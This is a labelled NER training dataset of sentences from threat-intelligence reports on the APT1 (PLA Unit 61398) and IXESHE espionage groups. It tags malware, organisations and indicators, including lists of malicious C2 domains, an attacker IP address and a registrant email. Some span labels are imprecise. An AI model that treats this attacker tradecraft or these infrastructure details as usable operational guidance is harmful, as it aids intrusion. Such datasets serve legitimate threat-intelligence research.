{"text": "PLA Unit 61398 is also located in precisely the same area from which APT1 activity appears to originate .", "spans": {"Organization: PLA": [[0, 3]], "Organization: Unit 61398": [[4, 14]], "Organization: APT1": [[69, 73]]}, "info": {"id": "aptner_train_001971", "source": "aptner_train"}}
{"text": "APT1 is believed to be the 2nd Bureau of the People ’s Liberation Army ( PLA ) General Staff Department ’s ( GSD ) 3rd Department , which is most commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 .", "spans": {"Organization: APT1": [[0, 4]], "Organization: Bureau of the People ’s Liberation Army": [[31, 70]], "Organization: PLA": [[73, 76]], "Organization: General Staff Department": [[79, 103]], "Organization: GSD": [[109, 112]], "Organization: Military Unit Cover Designator": [[168, 198]], "Organization: MUCD": [[201, 205]], "Organization: Unit 61398": [[211, 221]]}, "info": {"id": "aptner_train_001972", "source": "aptner_train"}}
{"text": "The nature of “ Unit 61398 ’s ” work is considered by China to be a state secret ; however , we believe it engages in harmful “ Computer Network Operations. ” Unit 61398 is partially situated on Datong Road in Gaoqiaozhen , which is located in the Pudong New Area of Shanghai .", "spans": {"Organization: Unit 61398": [[16, 26], [159, 169]]}, "info": {"id": "aptner_train_001973", "source": "aptner_train"}}
{"text": "The central building in this compound is a 130,663 square foot facility that is 12 stories high and was built in early 2007 .", "spans": {}, "info": {"id": "aptner_train_001974", "source": "aptner_train"}}
{"text": "APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations , and has demonstrated the capability and intent to steal from dozens of organizations simultaneously .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_001975", "source": "aptner_train"}}
{"text": "Since 2006 , Mandiant has observed APT1 compromise 141 companies spanning 20 major industries .", "spans": {"Organization: Mandiant": [[13, 21]], "Organization: APT1": [[35, 39]]}, "info": {"id": "aptner_train_001976", "source": "aptner_train"}}
{"text": "APT1 has a well-defined attack methodology , honed over years and designed to steal large volumes of valuable intellectual property .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_001977", "source": "aptner_train"}}
{"text": "Once APT1 has established access , they periodically revisit the victim ’s network over several months or years and steal broad categories of intellectual property , including technology blueprints , proprietary manufacturing processes , test results , business plans , pricing documents , partnership agreements , and emails and contact lists from victim organizations ’ leadership .", "spans": {"Organization: APT1": [[5, 9]], "System: emails": [[319, 325]]}, "info": {"id": "aptner_train_001978", "source": "aptner_train"}}
{"text": "APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email — GETMAIL and MAPIGET .", "spans": {"Organization: APT1": [[0, 4]], "System: email": [[135, 140]], "Malware: GETMAIL": [[143, 150]], "Malware: MAPIGET": [[155, 162]]}, "info": {"id": "aptner_train_001979", "source": "aptner_train"}}
{"text": "Establishing a foothold involves actions that ensure control of the target network ’s systems from outside the network .", "spans": {}, "info": {"id": "aptner_train_001980", "source": "aptner_train"}}
{"text": "APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed .", "spans": {"Organization: APT1": [[0, 4]], "System: email": [[33, 38]]}, "info": {"id": "aptner_train_001981", "source": "aptner_train"}}
{"text": "A backdoor is software that allows an intruder to send commands to the system remotely .", "spans": {}, "info": {"id": "aptner_train_001982", "source": "aptner_train"}}
{"text": "In almost every case , APT backdoors initiate outbound connections to the intruder ’s “ command and control ” ( C2 ) server .", "spans": {"System: C2": [[112, 114]]}, "info": {"id": "aptner_train_001983", "source": "aptner_train"}}
{"text": "APT intruders employ this tactic because while network firewalls are generally adept at keeping malware outside the network from initiating communication with systems inside the network , they are less reliable at keeping malware that is already inside the network from communicating to systems outside .", "spans": {}, "info": {"id": "aptner_train_001984", "source": "aptner_train"}}
{"text": "We will describe APT1 ’s backdoors in two categories : “ Beachhead Backdoors ” and “ Standard Backdoors. ”", "spans": {"Organization: APT1": [[17, 21]]}, "info": {"id": "aptner_train_001986", "source": "aptner_train"}}
{"text": "Beachhead backdoors are typically minimally featured .", "spans": {}, "info": {"id": "aptner_train_001987", "source": "aptner_train"}}
{"text": "They offer the attacker a toe-hold to perform simple tasks like retrieve files , gather basic system information and trigger the execution of other more significant capabilities such as a standard backdoor .", "spans": {}, "info": {"id": "aptner_train_001988", "source": "aptner_train"}}
{"text": "APT1 ’s beachhead backdoors are usually what we call WEBC2 backdoors .", "spans": {"Organization: APT1": [[0, 4]], "Malware: WEBC2 backdoors": [[53, 68]]}, "info": {"id": "aptner_train_001989", "source": "aptner_train"}}
{"text": "WEBC2 backdoors are probably the most well-known kind of APT1 backdoor , and are the reason why some security companies refer to APT1 as the “ Comment Crew. ” A WEBC2 backdoor is designed to retrieve a webpage from a C2 server .", "spans": {"Malware: WEBC2 backdoors": [[0, 15]], "Organization: APT1": [[57, 61], [129, 133]], "Malware: WEBC2 backdoor": [[161, 175]], "System: C2": [[217, 219]]}, "info": {"id": "aptner_train_001990", "source": "aptner_train"}}
{"text": "It expects the webpage to contain special HTML tags ; the backdoor will attempt to interpret the data between the tags as commands .", "spans": {"System: HTML": [[42, 46]]}, "info": {"id": "aptner_train_001991", "source": "aptner_train"}}
{"text": "Older versions of WEBC2 read data between HTML comments , though over time WEBC2 variants have evolved to read data contained within other types of tags .", "spans": {"Malware: WEBC2": [[18, 23], [75, 80]], "System: HTML": [[42, 46]]}, "info": {"id": "aptner_train_001992", "source": "aptner_train"}}
{"text": "From direct observation , we can confirm that APT1 was using WEBC2 backdoors as early as July 2006 .", "spans": {"Organization: APT1": [[46, 50]], "Malware: WEBC2 backdoors": [[61, 76]]}, "info": {"id": "aptner_train_001993", "source": "aptner_train"}}
{"text": "However , the first compile time35 we have for WEBC2 is 2004-01-23 , suggesting that APT1 has been crafting WEBC2 backdoors since early 2004 .", "spans": {"Malware: WEBC2": [[47, 52]], "Organization: APT1": [[85, 89]], "Malware: WEBC2 backdoors": [[108, 123]]}, "info": {"id": "aptner_train_001994", "source": "aptner_train"}}
{"text": "Based on the 400+ samples of WEBC2 variants that we have accumulated , it appears that APT1 has direct access to developers who have continually released new WEBC2 variants for over six years .", "spans": {"Malware: WEBC2": [[29, 34], [158, 163]], "Organization: APT1": [[87, 91]]}, "info": {"id": "aptner_train_001995", "source": "aptner_train"}}
{"text": "WEBC2 backdoors are often packaged with spear phishing emails .", "spans": {"Malware: WEBC2 backdoors": [[0, 15]], "System: emails": [[55, 61]]}, "info": {"id": "aptner_train_001996", "source": "aptner_train"}}
{"text": "Once installed , APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice .", "spans": {"Organization: APT1": [[17, 21]]}, "info": {"id": "aptner_train_001997", "source": "aptner_train"}}
{"text": "WEBC2 backdoors work for their intended purpose , but they generally have fewer features than the “ Standard Backdoors ” described below .", "spans": {"Malware: WEBC2 backdoors": [[0, 15]]}, "info": {"id": "aptner_train_001998", "source": "aptner_train"}}
{"text": "The standard , non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol ( to blend in with legitimate web traffic ) or a custom protocol that the malware authors designed themselves .", "spans": {"Malware: non-WEBC2": [[15, 24]], "Organization: APT1": [[25, 29]]}, "info": {"id": "aptner_train_001999", "source": "aptner_train"}}
{"text": "These backdoors give APT intruders a laundry list of ways to control victim systems .", "spans": {}, "info": {"id": "aptner_train_002000", "source": "aptner_train"}}
{"text": "The BISCUIT backdoor ( so named for the command “ bdkzt ” ) is an illustrative example of the range of commands that APT1 has built into its “ standard ” backdoors .", "spans": {"Malware: BISCUIT backdoor": [[4, 20]], "Malware: bdkzt": [[50, 55]], "Organization: APT1": [[117, 121]]}, "info": {"id": "aptner_train_002001", "source": "aptner_train"}}
{"text": "Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol .", "spans": {}, "info": {"id": "aptner_train_002003", "source": "aptner_train"}}
{"text": "When network defenders see the communications between these backdoors and their C2 servers , they might easily dismiss them as legitimate network traffic .", "spans": {"System: C2": [[80, 82]]}, "info": {"id": "aptner_train_002004", "source": "aptner_train"}}
{"text": "APT1 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002005", "source": "aptner_train"}}
{"text": "APT1 maintains an extensive infrastructure of computers around the world .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002006", "source": "aptner_train"}}
{"text": "We have evidence suggesting that APT1 manually controls thousands of systems in support of their attacks , and have directly observed their control over hundreds of these systems .", "spans": {"Organization: APT1": [[33, 37]]}, "info": {"id": "aptner_train_002007", "source": "aptner_train"}}
{"text": "Although they control systems in dozens of countries , their attacks originate from four large networks in Shanghai — two of which are allocated directly to the Pudong New Area , the home of Unit 61398 .", "spans": {"Organization: Unit 61398": [[191, 201]]}, "info": {"id": "aptner_train_002008", "source": "aptner_train"}}
{"text": "The sheer number of APT1 IP addresses concentrated in these Shanghai ranges , coupled with Simplified Chinese keyboard layout settings on APT1 ’s attack systems , betrays the true location and language of the operators .", "spans": {"Organization: APT1": [[20, 24], [138, 142]], "System: Simplified Chinese keyboard": [[91, 118]]}, "info": {"id": "aptner_train_002009", "source": "aptner_train"}}
{"text": "To help manage the vast number of systems they control , APT1 has registered hundreds of domain names , the majority of which also point to a Shanghai locale .", "spans": {"Organization: APT1": [[57, 61]]}, "info": {"id": "aptner_train_002010", "source": "aptner_train"}}
{"text": "The domain names and IP addresses together comprise APT1 ’s command and control framework which they manage in concert to camouflage their true origin from their English speaking targets .", "spans": {"Organization: APT1": [[52, 56]], "System: command and control": [[60, 79]]}, "info": {"id": "aptner_train_002011", "source": "aptner_train"}}
{"text": "As covered in the previous “ Attack Lifecycle ” section , WEBC2 backdoor variants download and interpret data stored between tags in HTML pages as commands .", "spans": {"Malware: WEBC2 backdoor": [[58, 72]], "System: HTML": [[133, 137]]}, "info": {"id": "aptner_train_002012", "source": "aptner_train"}}
{"text": "They usually download HTML pages from a system within APT1 ’s hop infrastructure .", "spans": {"System: HTML": [[22, 26]], "Organization: APT1": [[54, 58]]}, "info": {"id": "aptner_train_002013", "source": "aptner_train"}}
{"text": "We have observed APT1 intruders logging in to WEBC2 servers and manually editing the HTML pages that backdoors will download .", "spans": {"Organization: APT1": [[17, 21]], "Malware: WEBC2": [[46, 51]], "System: HTML": [[85, 89]]}, "info": {"id": "aptner_train_002014", "source": "aptner_train"}}
{"text": "Because the commands are usually encoded and difficult to spell from memory , APT1 intruders typically do not type these strings , but instead copy and paste them into the HTML files .", "spans": {"Organization: APT1": [[78, 82]], "System: HTML": [[172, 176]]}, "info": {"id": "aptner_train_002015", "source": "aptner_train"}}
{"text": "They likely generate the encoded commands on their own systems before pasting them in to an HTML file hosted by the hop point .", "spans": {"System: HTML": [[92, 96]]}, "info": {"id": "aptner_train_002016", "source": "aptner_train"}}
{"text": "For example , we observed an APT attacker pasting the string “ czo1NA== ” into an HTML page .", "spans": {"System: HTML": [[82, 86]]}, "info": {"id": "aptner_train_002017", "source": "aptner_train"}}
{"text": "That string is the base64 encoded version of “ s : 54 ” , meaning “ sleep for 54 minutes ” ( or hours , depending on the particular backdoor ) .", "spans": {}, "info": {"id": "aptner_train_002018", "source": "aptner_train"}}
{"text": "In lieu of manually editing an HTML file on a hop point , we have also observed APT1 intruders uploading new ( already-edited ) HTML files .", "spans": {"System: HTML": [[31, 35], [128, 132]], "Organization: APT1": [[80, 84]]}, "info": {"id": "aptner_train_002019", "source": "aptner_train"}}
{"text": "When APT1 attackers are not using WEBC2 , they require a “ command and control ” ( C2 ) user interface so they can issue commands to the backdoor .", "spans": {"Organization: APT1": [[5, 9]], "Malware: WEBC2": [[34, 39]], "System: command and control": [[59, 78]], "System: C2": [[83, 85]]}, "info": {"id": "aptner_train_002020", "source": "aptner_train"}}
{"text": "This interface sometimes runs on their personal attack system , which is typically in Shanghai .", "spans": {}, "info": {"id": "aptner_train_002021", "source": "aptner_train"}}
{"text": "In these instances , when a victim backdoor makes contact with a hop , the communications need to be forwarded from the hop to the intruder ’s Shanghai system so the backdoor can talk to the C2 server software .", "spans": {"System: C2": [[191, 193]]}, "info": {"id": "aptner_train_002022", "source": "aptner_train"}}
{"text": "We have observed 767 separate instances in which APT1 intruders used the publicly available “ HUC Packet Transmit Tool ” or HTRAN on a hop .", "spans": {"Organization: APT1": [[49, 53]], "System: HUC Packet Transmit Tool": [[94, 118]], "System: HTRAN": [[124, 129]]}, "info": {"id": "aptner_train_002023", "source": "aptner_train"}}
{"text": "As always , keep in mind that these uses are confirmed uses , and likely represent only a small fraction of APT1 ’s total activity .", "spans": {"Organization: APT1": [[108, 112]]}, "info": {"id": "aptner_train_002024", "source": "aptner_train"}}
{"text": "The HTRAN utility is merely a middle-man , facilitating connections between the victim and the attacker who is using the hop point .", "spans": {"System: HTRAN": [[4, 9]]}, "info": {"id": "aptner_train_002025", "source": "aptner_train"}}
{"text": "Typical use of HTRAN is fairly simple : the attacker must specify the originating IP address ( of his or her workstation in Shanghai ) , and a port on which to accept connections .", "spans": {"System: HTRAN": [[15, 20]]}, "info": {"id": "aptner_train_002026", "source": "aptner_train"}}
{"text": "For example , the following command , which was issued by an APT1 actor , will listen for incoming connections on port 443 on the hop and automatically proxy them to the Shanghai IP address 58.247.242.254 on port 443 .", "spans": {"Organization: APT1": [[61, 65]], "Indicator: 58.247.242.254": [[190, 204]]}, "info": {"id": "aptner_train_002027", "source": "aptner_train"}}
{"text": "Occasionally , APT1 attackers have installed C2 server components on systems in their hop infrastructure rather than forwarding connections back to C2 servers in Shanghai .", "spans": {"Organization: APT1": [[15, 19]], "System: C2": [[45, 47], [148, 150]]}, "info": {"id": "aptner_train_002028", "source": "aptner_train"}}
{"text": "In these instances they do not need to use a proxy tool like HTRAN to interact with victim systems .", "spans": {"System: HTRAN": [[61, 66]]}, "info": {"id": "aptner_train_002029", "source": "aptner_train"}}
{"text": "However , it does mean that the intruders need to be able to interface with the ( often graphical ) C2 server software running on the hop .", "spans": {"System: C2": [[100, 102]]}, "info": {"id": "aptner_train_002030", "source": "aptner_train"}}
{"text": "We have observed APT1 intruders log in to their hop point , start the C2 server , wait for incoming connections , and then proceed to give commands to victim systems .", "spans": {"Organization: APT1": [[17, 21]], "System: C2": [[70, 72]]}, "info": {"id": "aptner_train_002031", "source": "aptner_train"}}
{"text": "WEBC2 variants may include a server component that provides a simple C2 interface to the intruder .", "spans": {"Malware: WEBC2": [[0, 5]], "System: C2": [[69, 71]]}, "info": {"id": "aptner_train_002032", "source": "aptner_train"}}
{"text": "This saves the intruder from having to manually edit webpages .", "spans": {}, "info": {"id": "aptner_train_002033", "source": "aptner_train"}}
{"text": "That is , this server component receives connections from victim backdoors , displays them to the intruder , and then translates the intruder ’s commands into HTML tags that the victim backdoors read .", "spans": {"System: HTML": [[159, 163]]}, "info": {"id": "aptner_train_002034", "source": "aptner_train"}}
{"text": "In the last two years alone , we have confirmed 937 APT1 C2 servers — that is , actively listening or communicating programs — running on 849 distinct IP addresses .", "spans": {"Organization: APT1": [[52, 56]], "System: C2": [[57, 59]]}, "info": {"id": "aptner_train_002035", "source": "aptner_train"}}
{"text": "However , we have evidence to suggest that APT1 is running hundreds , and likely thousands , of other servers ( see the Domains section below ) .", "spans": {"Organization: APT1": [[43, 47]]}, "info": {"id": "aptner_train_002036", "source": "aptner_train"}}
{"text": "The programs acting as APT1 servers have mainly been : FTP , for transferring files ; web , primarily for WEBC2 ; RDP , for remote graphical control of a system ; HTRAN , for proxying ; and C2 servers associated with various backdoor families .", "spans": {"Organization: APT1": [[23, 27]], "Malware: WEBC2": [[106, 111]], "System: HTRAN": [[163, 168]], "System: C2": [[190, 192]]}, "info": {"id": "aptner_train_002037", "source": "aptner_train"}}
{"text": "The Domain Name System ( DNS ) is the phone book of the Internet .", "spans": {}, "info": {"id": "aptner_train_002038", "source": "aptner_train"}}
{"text": "In the same way that people program named contacts into their cell phones and no longer need to remember phone numbers , DNS allows people to remember names like “ google.com ” instead of IP addresses .", "spans": {"Indicator: google.com": [[164, 174]]}, "info": {"id": "aptner_train_002039", "source": "aptner_train"}}
{"text": "When a person types “ google.com ” into a web browser , a DNS translation to an IP address occurs so that the person ’s computer can communicate with Google .", "spans": {"Indicator: google.com": [[22, 32]], "Organization: Google": [[150, 156]]}, "info": {"id": "aptner_train_002040", "source": "aptner_train"}}
{"text": "Names that can be translated through DNS to IP addresses are referred to as Fully Qualified Domain Names ( FQDNs ) .", "spans": {"System: Fully Qualified Domain Names": [[76, 104]], "System: FQDNs": [[107, 112]]}, "info": {"id": "aptner_train_002041", "source": "aptner_train"}}
{"text": "A DNS zone represents a collection of FQDNs that end with the same name , and which are usually registered through a domain registration company and controlled by a single owner .", "spans": {"System: FQDNs": [[38, 43]]}, "info": {"id": "aptner_train_002042", "source": "aptner_train"}}
{"text": "For example , “ hugesoft.org ” is an FQDN but also represents a zone .", "spans": {"Indicator: hugesoft.org": [[16, 28]], "System: FQDN": [[37, 41]]}, "info": {"id": "aptner_train_002043", "source": "aptner_train"}}
{"text": "The FQDNs “ ug-co.hugesoft.org ” and “ 7cback.hugesoft.org ” are part of the “ hugesoft.org ” zone and are called “ subdomains ” of the zone .", "spans": {"System: FQDNs": [[4, 9]], "Indicator: ug-co.hugesoft.org": [[12, 30]], "Indicator: 7cback.hugesoft.org": [[39, 58]], "Indicator: hugesoft.org": [[79, 91]]}, "info": {"id": "aptner_train_002044", "source": "aptner_train"}}
{"text": "The person who registered “ hugesoft.org ” may add as many subdomains as they wish and controls the IP resolutions of these FQDNs .", "spans": {"Indicator: hugesoft.org": [[28, 40]], "System: FQDNs": [[124, 129]]}, "info": {"id": "aptner_train_002045", "source": "aptner_train"}}
{"text": "APT1 has registered at least 107 zones since 2004 .", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002046", "source": "aptner_train"}}
{"text": "Within these zones , we know of thousands of FQDNs that have resolved to hundreds of IP addresses ( which we suspect are hops ) and in some instances to APT1 ’s source IP addresses in Shanghai .", "spans": {"System: FQDNs": [[45, 50]], "Organization: APT1": [[153, 157]]}, "info": {"id": "aptner_train_002047", "source": "aptner_train"}}
{"text": "The first zone we became aware of was “ hugesoft.org ” , which was registered through eNom , Inc. in October 2004 .", "spans": {"Indicator: hugesoft.org": [[40, 52]]}, "info": {"id": "aptner_train_002048", "source": "aptner_train"}}
{"text": "The registrant supplied “ uglygorilla@163.com ” as an email address .", "spans": {"Indicator: uglygorilla@163.com": [[26, 45]], "System: email": [[54, 59]]}, "info": {"id": "aptner_train_002049", "source": "aptner_train"}}
{"text": "The supplied registration information , which is still visible in public “ whois ” data as of February 3, 2013 .", "spans": {"System: whois": [[75, 80]]}, "info": {"id": "aptner_train_002050", "source": "aptner_train"}}
{"text": "The supplied registrant information does not need to be accurate for the zone to be registered successfully .", "spans": {}, "info": {"id": "aptner_train_002051", "source": "aptner_train"}}
{"text": "For example , “ shanghai ” is not a street name .", "spans": {}, "info": {"id": "aptner_train_002052", "source": "aptner_train"}}
{"text": "Nevertheless , it is noteworthy that Shanghai appeared in the first known APT1 domain registration , along with a phone number that begins with China ’s “ +86 ” international code .", "spans": {"Organization: APT1": [[74, 78]]}, "info": {"id": "aptner_train_002053", "source": "aptner_train"}}
{"text": "In fact , Shanghai was listed as the registrant ’s city in at least 24 of the 107 ( 22% ) registrations .", "spans": {}, "info": {"id": "aptner_train_002054", "source": "aptner_train"}}
{"text": "Overall , the combination of a relatively high number of “ Shanghai ” registrations with obviously false registration examples in other registrations suggests a partially uncoordinated domain registration campaign from 2004 until present , in which some registrants tried to fabricate non-Shanghai locations but others did not .", "spans": {}, "info": {"id": "aptner_train_002055", "source": "aptner_train"}}
{"text": "This is supported by contextual information on the Internet for the email address “ lfengg@163.com , ” which was supplied in the registration information for seven of the 107 zones .", "spans": {"System: email": [[68, 73]], "Indicator: lfengg@163.com": [[84, 98]]}, "info": {"id": "aptner_train_002056", "source": "aptner_train"}}
{"text": "On the site “ www.china-one.org , ” the email address “ lfengg@163.com ” appears as the contact for the Shanghai Kai Optical Information Technology Co. , Ltd. , a website production company located in a part of Shanghai that is across the river from PLA Unit 61398 .", "spans": {"Indicator: www.china-one.org": [[14, 31]], "System: email": [[40, 45]], "Indicator: lfengg@163.com": [[56, 70]], "Organization: Kai Optical Information Technology": [[113, 147]], "Organization: PLA": [[250, 253]], "Organization: Unit 61398": [[254, 264]]}, "info": {"id": "aptner_train_002057", "source": "aptner_train"}}
{"text": "About half of APT1 ’s known zones were named according to three themes : news , technology and business .", "spans": {"Organization: APT1": [[14, 18]]}, "info": {"id": "aptner_train_002058", "source": "aptner_train"}}
{"text": "These themes cause APT1 command and control addresses to appear benign at first glance .", "spans": {"Organization: APT1": [[19, 23]]}, "info": {"id": "aptner_train_002059", "source": "aptner_train"}}
{"text": "However , we believe that the hundreds of FQDNs within these zones were created for the purpose of APT1 intrusions . ( Note : these themes are not unique to APT1 or even APT in general . ) The news-themed zones include the names of well-known news media outlets such as CNN , Yahoo and Reuters .", "spans": {"System: FQDNs": [[42, 47]], "Organization: APT1": [[99, 103], [157, 161]], "Organization: CNN": [[270, 273]], "Organization: Yahoo": [[276, 281]], "Organization: Reuters": [[286, 293]]}, "info": {"id": "aptner_train_002060", "source": "aptner_train"}}
{"text": "However , they also include names referencing English-speaking countries , such as “ aunewsonline.com ” ( Australia ) , “ canadatvsite.com ” ( Canada ) , and “ todayusa.org ” ( U.S . ) .", "spans": {"Indicator: aunewsonline.com": [[85, 101]], "Indicator: canadatvsite.com": [[122, 138]], "Indicator: todayusa.org": [[160, 172]]}, "info": {"id": "aptner_train_002061", "source": "aptner_train"}}
{"text": "Below is a list of zones registered by APT1 that are newsthemed :", "spans": {"Organization: APT1": [[39, 43]]}, "info": {"id": "aptner_train_002062", "source": "aptner_train"}}
{"text": "aoldaily.com aunewsonline.com canadatvsite.com canoedaily.com cnndaily.com cnndaily.net cnnnewsdaily.com defenceonline.net freshreaders.net giftnews.org reutersnewsonline.com rssadvanced.org saltlakenews.org sportreadok.net todayusa.org usapappers.com usnewssite.com yahoodaily.com .", "spans": {"Indicator: aoldaily.com": [[0, 12]], "Indicator: aunewsonline.com": [[13, 29]], "Indicator: canadatvsite.com": [[30, 46]], "Indicator: canoedaily.com": [[47, 61]], "Indicator: cnndaily.com": [[62, 74]], "Indicator: cnndaily.net": [[75, 87]], "Indicator: cnnnewsdaily.com": [[88, 104]], "Indicator: defenceonline.net": [[105, 122]], "Indicator: freshreaders.net": [[123, 139]], "Indicator: giftnews.org": [[140, 152]], "Indicator: reutersnewsonline.com": [[153, 174]], "Indicator: rssadvanced.org": [[175, 190]], "Indicator: saltlakenews.org": [[191, 207]], "Indicator: sportreadok.net": [[208, 223]], "Indicator: todayusa.org": [[224, 236]], "Indicator: usapappers.com": [[237, 251]], "Indicator: usnewssite.com": [[252, 266]], "Indicator: yahoodaily.com": [[267, 281]]}, "info": {"id": "aptner_train_002063", "source": "aptner_train"}}
{"text": "The technology-themed zones reference well-known technology companies ( AOL , Apple , Google , Microsoft ) , antivirus vendors ( McAfee , Symantec ) , and products ( Blackberry , Bluecoat ) .", "spans": {"Organization: AOL": [[72, 75]], "Organization: Apple": [[78, 83]], "Organization: Google": [[86, 92]], "Organization: Microsoft": [[95, 104]], "Organization: McAfee": [[129, 135]], "Organization: Symantec": [[138, 146]], "Organization: Blackberry": [[166, 176]], "Organization: Bluecoat": [[179, 187]]}, "info": {"id": "aptner_train_002064", "source": "aptner_train"}}
{"text": "APT1 also used more generic names referencing topics like software :", "spans": {"Organization: APT1": [[0, 4]]}, "info": {"id": "aptner_train_002065", "source": "aptner_train"}}
{"text": "globalowa.com gmailboxes.com hugesoft.org idirectech.com ifexcel.com infosupports.com livemymsn.com mcafeepaying.com microsoft-update-info.com micyuisyahooapis.com msnhome.org pcclubddk.net progammerli.com softsolutionbox.net symanteconline.net webservicesupdate.com .", "spans": {"Indicator: globalowa.com": [[0, 13]], "Indicator: gmailboxes.com": [[14, 28]], "Indicator: hugesoft.org": [[29, 41]], "Indicator: idirectech.com": [[42, 56]], "Indicator: ifexcel.com": [[57, 68]], "Indicator: infosupports.com": [[69, 85]], "Indicator: livemymsn.com": [[86, 99]], "Indicator: mcafeepaying.com": [[100, 116]], "Indicator: microsoft-update-info.com": [[117, 142]], "Indicator: micyuisyahooapis.com": [[143, 163]], "Indicator: msnhome.org": [[164, 175]], "Indicator: pcclubddk.net": [[176, 189]], "Indicator: progammerli.com": [[190, 205]], "Indicator: softsolutionbox.net": [[206, 225]], "Indicator: symanteconline.net": [[226, 244]], "Indicator: webservicesupdate.com": [[245, 266]]}, "info": {"id": "aptner_train_002066", "source": "aptner_train"}}
{"text": "Finally , some zones used by APT1 reflect a business theme .", "spans": {"Organization: APT1": [[29, 33]]}, "info": {"id": "aptner_train_002067", "source": "aptner_train"}}
{"text": "The names suggest websites that professionals might visit :", "spans": {}, "info": {"id": "aptner_train_002068", "source": "aptner_train"}}
{"text": "advanbusiness.com businessconsults.net businessformars.com companyinfosite.com conferencesinfo.com copporationnews.com .", "spans": {"Indicator: advanbusiness.com": [[0, 17]], "Indicator: businessconsults.net": [[18, 38]], "Indicator: businessformars.com": [[39, 58]], "Indicator: companyinfosite.com": [[59, 78]], "Indicator: conferencesinfo.com": [[79, 98]], "Indicator: copporationnews.com": [[99, 118]]}, "info": {"id": "aptner_train_002069", "source": "aptner_train"}}
{"text": "APT1 intruders often use the FQDNs that are associated with legitimate websites hosted by their hop points .", "spans": {"Organization: APT1": [[0, 4]], "System: FQDNs": [[29, 34]]}, "info": {"id": "aptner_train_002070", "source": "aptner_train"}}
{"text": "We consider these domains to be “ hijacked ” because they were registered by someone for a legitimate reason , but have been leveraged by APT1 for malicious purposes .", "spans": {"Organization: APT1": [[138, 142]]}, "info": {"id": "aptner_train_002071", "source": "aptner_train"}}
{"text": "APT1 uses hijacked FQDNs for two main purposes .", "spans": {"Organization: APT1": [[0, 4]], "System: FQDNs": [[19, 24]]}, "info": {"id": "aptner_train_002072", "source": "aptner_train"}}
{"text": "First , they place malware ( usually in ZIP files ) on the legitimate websites hosted on the hop point and then send spear phishing emails with a link that includes the legitimate FQDN .", "spans": {"System: ZIP": [[40, 43]], "System: emails": [[132, 138]], "System: FQDN": [[180, 184]]}, "info": {"id": "aptner_train_002073", "source": "aptner_train"}}
{"text": "APT12 .", "spans": {"Organization: APT12": [[0, 5]]}, "info": {"id": "aptner_train_002074", "source": "aptner_train"}}
{"text": "This research paper will delve into another prominent group of attackers referred to as “ IXESHE ” ( pronounced “ i-sushi ” ) , based on one of the more common detection names security companies use for the malware they utilize .", "spans": {"Organization: IXESHE": [[90, 96]]}, "info": {"id": "aptner_train_002075", "source": "aptner_train"}}
{"text": "This campaign is notable for targeting East Asian governments , electronics manufacturers , and a telecommunications company .", "spans": {}, "info": {"id": "aptner_train_002076", "source": "aptner_train"}}
{"text": "The IXESHE campaign makes use of targeted emails with malicious attachments to compromise victims ’ systems .", "spans": {"Organization: IXESHE": [[4, 10]], "System: emails": [[42, 48]]}, "info": {"id": "aptner_train_002077", "source": "aptner_train"}}
{"text": "The emails are often tailored for specific victims and contain malicious attachments that are almost always “ weaponized ” .PDF files with known exploits that drop malware executables onto targeted systems .", "spans": {"System: emails": [[4, 10]], "Indicator: .PDF": [[123, 127]]}, "info": {"id": "aptner_train_002078", "source": "aptner_train"}}
{"text": "In addition , the IXESHE attackers conducted two specific attacks that leveraged zero-day exploits—one in 2009 and another in 2011 .", "spans": {"Organization: IXESHE": [[18, 24]], "Vulnerability: zero-day": [[81, 89]]}, "info": {"id": "aptner_train_002079", "source": "aptner_train"}}
{"text": "The IXESHE attackers almost always make use of compromised servers as command-and-control ( C&C ) servers .", "spans": {"Organization: IXESHE": [[4, 10]], "System: command-and-control": [[70, 89]], "System: C&C": [[92, 95]]}, "info": {"id": "aptner_train_002080", "source": "aptner_train"}}
{"text": "In some cases , the compromised servers are hosted on target organizations ’ networks after successful infiltration so the attackers can increase their control of the victims ’ infrastructure .", "spans": {}, "info": {"id": "aptner_train_002081", "source": "aptner_train"}}
{"text": "Using this approach , the attackers amassed at least 60 C&C servers over time .", "spans": {"System: C&C": [[56, 59]]}, "info": {"id": "aptner_train_002082", "source": "aptner_train"}}
{"text": "This technique also allows the attackers to cover their tracks , as having the C&C server in the victims ’ corporate networks means very little C&C traffic leaves them .", "spans": {"System: C&C": [[79, 82], [144, 147]]}, "info": {"id": "aptner_train_002083", "source": "aptner_train"}}
{"text": "The attackers ’ deliberate use of compromised machines and dynamic Domain Name System ( DNS ) services allows them to hide traces of their presence by confusing their activities with data belonging to legitimate individuals .", "spans": {}, "info": {"id": "aptner_train_002084", "source": "aptner_train"}}
{"text": "Looking at threat intelligence derived from tracking APT campaigns over time primarily based on the network traffic generated by the malware used , we were able to develop indicators of compromise for the IXESHE campaign .", "spans": {"Organization: IXESHE": [[205, 211]]}, "info": {"id": "aptner_train_002085", "source": "aptner_train"}}
{"text": "The malware samples used in this campaign were not very complicated by nature but do give the attackers almost complete control over their targets ’ compromised systems .", "spans": {}, "info": {"id": "aptner_train_002086", "source": "aptner_train"}}
{"text": "Most of the IP addresses of IXESHE ’s victims are linked to DSL networks , which made it difficult to determine their identities .", "spans": {"Organization: IXESHE": [[28, 34]], "System: DSL": [[60, 63]]}, "info": {"id": "aptner_train_002087", "source": "aptner_train"}}
{"text": "Careful research , however , allowed the identification of some of the attackers ’ victims : East Asian governments , Taiwanese electronics manufacturers , A telecommunications company .", "spans": {}, "info": {"id": "aptner_train_002088", "source": "aptner_train"}}
{"text": "Campaign victims were identified by using Whois records and open source research .", "spans": {"System: Whois": [[42, 47]]}, "info": {"id": "aptner_train_002089", "source": "aptner_train"}}
